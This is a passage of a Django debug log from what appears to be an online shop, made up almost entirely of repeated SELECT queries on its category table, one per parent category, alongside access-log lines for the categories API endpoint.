"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:49:32,195 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:49:32,199 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:49:32] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:49:32,823 utils 4252 140031732287232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:49:32,834 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:49:32,840 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:49:32,844 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:49:32,850 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:49:32,854 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:49:32,858 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:49:32,862 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:49:32,867 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:49:32,872 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:49:32,877 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:49:32,881 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:49:32,885 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:49:32,889 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:49:32,895 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:49:32,899 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:49:32,903 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:49:32,907 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:49:32,911 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:49:32,917 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:49:32,921 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:49:32,925 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:49:32,929 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:49:32,932 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:49:32,936 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:49:32,942 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:49:32,946 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:49:32,950 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:49:32,954 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:49:32,958 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:49:32,963 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:49:32,967 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:49:32,969 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:49:32,972 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:49:32,974 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:49:32,977 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:49:32,979 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:49:32,982 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:49:32,984 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:49:32,986 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:49:32,988 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:49:32,991 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:49:32,993 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:49:32,995 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:49:32,998 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:49:33,000 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:49:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 06:51:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 06:51:47,315 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:51:47,324 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:51:47,328 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:51:47,331 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:51:47,335 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:51:47,338 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:51:47,340 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:51:47,344 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:51:47,348 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:51:47,354 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:51:47,358 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:51:47,362 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:51:47,366 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:51:47,369 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:51:47,375 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:51:47,379 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:51:47,382 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:51:47,386 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:51:47,390 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", 